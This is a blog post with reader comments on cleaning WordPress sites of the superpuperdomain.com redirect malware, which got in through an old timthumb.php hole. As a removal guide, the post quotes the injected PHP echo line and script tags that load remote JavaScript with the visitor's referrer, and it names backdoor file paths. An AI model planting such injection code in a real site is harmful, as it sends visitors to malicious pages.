PhpRemoteView hack: Superpuperdomain.com- How to Remove it

A few days ago a new PhpRemoteView hack, a malicious JavaScript loading from superpuperdomain.com/count.php, attacked many WordPress website, including some of mine. There are already a few discussions on this topic and it was a pretty difficult to find a reliable source how to get rid of this problem, but a few websites like tbogard.com and techspheria.com introduce interesting solutions, which I combined together and first tested on my sites, before wraining this article (it worked on my WP blogs btw:)

Generally, the JavaScript
'<script language="javascript" src="http://superpuperdomain.com/count.php?ref...></script>';
redirects visitors that were going to the WordPress site to fake search engines full of ads. To check if you have it (except the obvious- redirection:), try to find a similar chunk of code on your homepage (it should appear just at the end of the html code, behind the closing body tag:

'<script language="javascript" SRC="http://superpuperdomain.com/count.php?ref=http%3A%2F%2Fsite.com%2Fdif%2F"></script>';

It is caused by a security vulnerability in timthumb.php (also known as tumb.php), which is is a free PHP script that resizes images used by many WP themes developers. Many great WP themes use that script including Elegant Themes, so if you haven’t updated your theme during the last 5 days, your website is probably infected by it! Here is a step by step solution…

How to get rid of this superpuperdomain.com’s Javascirpt Malware:

  • Go to your index.php and delete the following code:

echo '<script type="text/javascript" language="javascript" src="http://superpuperdomain.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']) .'"></script>';

remember about leaving ?> at the end of the code!

  • Search for the following files on your server and delete them:

/wp-admin/js/config.php
/wp-admin/common.php
/wp-admin/udp.php
/wp-content/udp.php

Those files are added by hackers and are a part of the phpRemoteView hack, but just in case back up those files (do not open them!!!).

  • Update the Timthumb.php

As the creator of this plugin has been informed about this issue a few days ago, the latest corrected versionis already has been created and is available to download here:  http://code.google.com/p/timthumb/ so please upload it to your server to replace to old version of Timthumb.php with the new file.

  • Make sure that your file permissions are correctly set.

According to WP – Security Scan (which I personally use on a few sites), I set the following permissions:
Wordpress Custom Sidebar Screenshot
but I also recommend this WordPress article on that

  • At the end, you can also block the http://superpuperdomain.com’s IP addresses in your htttaccess file add so additional rules to the httaccess file itself.

I hope that all of that help you, but let me know if you come across any more problems with that Malware.

Mags Sikora

I'm Mags, an SEO Consultant, London

  • http://fredrik.forséll.se Fredrik

    Thanks, helpful!

  • http://fredrik.forséll.se Fredrik

    Thanks, helpful!

  • http://fredrik.forséll.se Fredrik

    Thanks, that was helpful

  • http://fredrik.forséll.se Fredrik

    Thanks, that was helpful

  • Anonymous

    I have just had this problem and I am using timthumb in my elegant theme. will get on this right away. Saviour!

  • Anonymous

    I have just had this problem and I am using timthumb in my elegant theme. will get on this right away. Saviour!

  • http://twitter.com/DynamiteTom Tom

    Three of my websites hosted on three difference servers have been affected and I am in the middle of cleaning it now – the infection also changes the .htaccess file and redirects to some dodgy .ru domains…

  • http://twitter.com/DynamiteTom Tom

    Three of my websites hosted on three difference servers have been affected and I am in the middle of cleaning it now – the infection also changes the .htaccess file and redirects to some dodgy .ru domains…

  • Miriam

    Hello, after fixing all the points mentioned above, the superduper-attack disapperared. However, since then the wohle comment system of wordpress in my blog broke down. Do you have any idea about a correlation between this hack and the WP-comments? Thanks a lot and lovely greetings, Miriam

  • Miriam

    Hello, after fixing all the points mentioned above, the superduper-attack disapperared. However, since then the wohle comment system of wordpress in my blog broke down. Do you have any idea about a correlation between this hack and the WP-comments? Thanks a lot and lovely greetings, Miriam

  • Louie Villalobos

    Dude. Thank you for this.

  • Louie Villalobos

    I don’t know who you are, but I love you for helping me fix my site.